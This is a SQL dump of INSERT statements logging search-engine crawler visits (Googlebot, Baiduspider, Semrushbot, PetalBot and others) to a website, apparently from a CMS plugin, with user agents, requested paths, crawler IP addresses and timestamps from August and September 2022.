INSERT INTO `ey_weapp_spider_visit` VALUES ('98762', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/81.html', '66.249.79.108', '1662330877', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98769', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/132.html', '116.179.32.148', '1662335961', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98806', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/yqal', '220.181.108.158', '1662355126', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98807', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/9_37.html', '185.191.171.2', '1662355447', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98796', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/466.html', '66.249.79.112', '1662347679', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98797', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/375.html', '114.119.151.155', '1662347756', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98798', '2', 'mozilla/5.0 (compatible; baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)', '/', '140.237.230.194', '1662349263', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98777', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/458.html', '185.191.171.4', '1662341167', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98784', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/products/327.html', '114.119.151.153', '1662343192', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98785', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/437.html', '185.191.171.6', '1662343510', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98795', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/products/254.html', '220.181.108.145', '1662347633', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98790', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/jiaruwomen/', '114.119.151.155', '1662346932', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98792', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/case/235.html', '114.119.151.155', '1662347117', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98804', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/case/57.html', '114.119.151.153', '1662353526', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98805', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '58.250.125.86', '1662354902', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98853', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/contact/', '114.119.151.155', '1662382543', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98863', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/', '220.181.108.83', '1662390912', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98877', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/81.html', '66.249.79.112', '1662403980', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98879', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/20.html', '185.191.171.2', '1662406380', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98881', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/147.html', '66.249.79.108', '1662409355', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98882', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/products/328.html', '185.191.171.21', '1662410380', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98891', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/bengche', '66.249.79.110', '1662415166', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98894', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/products/75.html?admin_id=1', '114.119.151.153', '1662415492', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98919', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/', '40.77.167.9', '1662432063', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98922', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/tbxw/', '66.249.79.112', '1662435449', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98923', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/257.html', '185.191.171.10', '1662436486', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98924', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/228.html', '185.191.171.2', '1662437064', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98925', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/case/65.html', '116.179.32.77', '1662437597', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98926', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.108', '1662440143', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98954', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '123.125.109.37', '1662450713', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98962', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/54.html', '185.191.171.13', '1662453877', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98966', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/474.html', '66.249.79.110', '1662456146', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98977', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/bljxw/', '162.55.86.60', '1662457243', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98993', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/288.html', '162.55.86.60', '1662457295', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99003', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/391.html', '162.55.86.60', '1662457326', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99009', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/472.html', '162.55.86.60', '1662457347', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99061', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/6_3.html', '185.191.171.35', '1662475450', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99045', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tbxw/', '185.191.171.24', '1662464876', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99047', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/31_9.html', '185.191.171.24', '1662465847', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99048', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/371.html', '66.249.79.108', '1662466840', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99050', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/', '40.77.167.9', '1662467570', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99052', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/1_31.html', '185.191.171.26', '1662470081', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99056', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/217.html', '66.249.79.110', '1662473269', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99059', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/gongsijianjie/', '116.179.32.12', '1662474546', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99063', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/bcxw/', '220.181.108.101', '1662476330', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99126', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/honor/24.html', '162.55.86.60', '1662487619', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99068', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/37.html?tagid=37', '185.191.171.21', '1662477766', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99125', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/gqal/list_87_2/', '162.55.86.60', '1662487614', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99072', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/list_3_16/', '216.244.66.194', '1662479173', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99073', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/178.html', '185.191.171.22', '1662479238', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99074', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/246.html', '185.191.171.18', '1662480061', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99076', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/list_3_20/', '185.191.171.11', '1662480280', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99078', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/city/suzhoushi.html', '220.181.108.110', '1662481689', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99079', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/', '69.14.27.140', '1662481832', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99080', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/products/72.html', '185.191.171.23', '1662481835', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99097', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/bljwd/list_20_2/', '162.55.86.60', '1662487505', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99088', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/city/xuanwuhuqu.html', '220.181.108.157', '1662486486', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99094', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/bcxw/list_19_9/', '162.55.86.60', '1662487495', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99093', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/bcxw/list_19_5/', '162.55.86.60', '1662487491', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99099', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/bljwd/list_20_4/', '162.55.86.60', '1662487511', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99107', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/buliaoji/', '162.55.86.60', '1662487543', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99114', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/case/239.html', '162.55.86.60', '1662487571', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99121', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/case/73.html', '162.55.86.60', '1662487602', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99151', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/496.html', '162.55.86.60', '1662487732', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99156', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/list_3_3/', '162.55.86.60', '1662487750', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99172', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/list_3_32/', '185.191.171.15', '1662488471', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99184', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/25.html?tagid=25', '185.191.171.21', '1662490307', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99178', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/qpq.html', '114.119.151.146', '1662488877', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99181', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/tss.html', '114.119.151.151', '1662489043', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99192', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/472.html', '185.191.171.35', '1662496167', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99197', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/9_47.html', '185.191.171.5', '1662499245', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99199', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/24.html', '185.191.171.41', '1662501410', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99200', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/499.html', '66.249.79.112', '1662502785', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99205', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/90.html', '66.249.79.108', '1662509044', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99206', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/495.html', '66.249.79.110', '1662509317', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94254', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/313.html', '66.249.79.108', '1660169628', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94284', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.112', '1660179109', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94291', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '61.135.159.141', '1660184399', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94365', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/bljxw/', '220.181.108.113', '1660229629', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94609', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/102.html', '185.191.171.45', '1660370881', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94684', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/368.html', '66.249.79.110', '1660408664', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94697', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/162.html', '66.249.79.108', '1660418064', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94749', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.108', '1660450220', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94773', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/products/81.html', '220.181.108.169', '1660465608', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94794', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/tags/52_4.html', '66.249.79.110', '1660475063', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94802', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/217.html', '114.119.151.155', '1660477288', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94810', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/bc/', '185.191.171.42', '1660480571', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94814', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/257.html', '114.119.151.153', '1660481835', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94847', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/list_3_46/', '185.191.171.13', '1660501713', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94866', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/bljxw/list_18_2/', '114.119.151.155', '1660510553', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94870', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/80_2.html', '185.191.171.16', '1660511951', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94922', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/224.html', '220.181.108.174', '1660539307', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94928', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '49.7.21.95', '1660543191', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94990', '99', 'mozilla/5.0 (compatible; orbbot/1.1;)', '/products/86.html', '54.215.245.183', '1660571297', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94988', '99', 'mozilla/5.0 (compatible; orbbot/1.1;)', '/products/335.html', '13.56.59.10', '1660571297', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94997', '99', 'mozilla/5.0 (compatible; orbbot/1.1;)', '/products/71.html', '52.53.225.26', '1660571298', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95103', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/1_25.html', '116.179.32.34', '1660625711', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95173', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.108', '1660654422', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95204', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/208.html', '220.181.108.169', '1660670741', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95254', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/9_19.html', '220.181.108.103', '1660705160', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95257', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/178.html', '66.249.79.108', '1660705987', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95263', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.108', '1660712448', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95264', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/1_18.html', '185.191.171.40', '1660712776', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95275', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/419.html', '66.249.79.112', '1660721337', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95828', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/news/164.html', '207.46.13.179', '1661040031', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95829', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/tags/80.html', '66.249.79.108', '1661041498', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95832', '99', 'mozilla/5.0 (compatible; seznambot/3.2; +http://napoveda.seznam.cz/en/seznambot-intro/)', '/gongsijianjie/', '77.75.79.54', '1661045287', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95834', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '118.184.177.44', '1661047956', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95838', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/products/267.html', '114.119.151.155', '1661050613', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95850', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/shuozhou.html', '114.119.151.153', '1661057795', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96345', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/86.html', '185.191.171.44', '1661265035', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95859', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/317.html', '185.191.171.44', '1661061658', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95892', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/products/264.html', '185.191.171.33', '1661076761', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95995', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/case/60.html', '66.249.79.112', '1661137412', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96039', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/424.html', '185.191.171.10', '1661156767', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96106', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/101.html', '185.191.171.10', '1661189825', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96143', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/sns.html', '114.119.151.155', '1661204772', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96150', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/tags/221.html', '61.135.159.158', '1661207352', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96153', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/tags/231.html', '118.184.177.13', '1661210321', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96154', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/13_2.html', '185.191.171.19', '1661210396', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96184', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/gqal/', '162.55.86.60', '1661218155', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96198', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/374.html', '162.55.86.60', '1661218244', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96215', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/products/315.html', '162.55.86.60', '1661218358', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96582', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/honor/24.html', '114.119.151.153', '1661374056', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96604', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/9_41.html', '220.181.108.84', '1661382696', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96617', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/list_3_25/', '185.191.171.2', '1661388940', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96620', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/459.html', '185.191.171.18', '1661392062', '0');
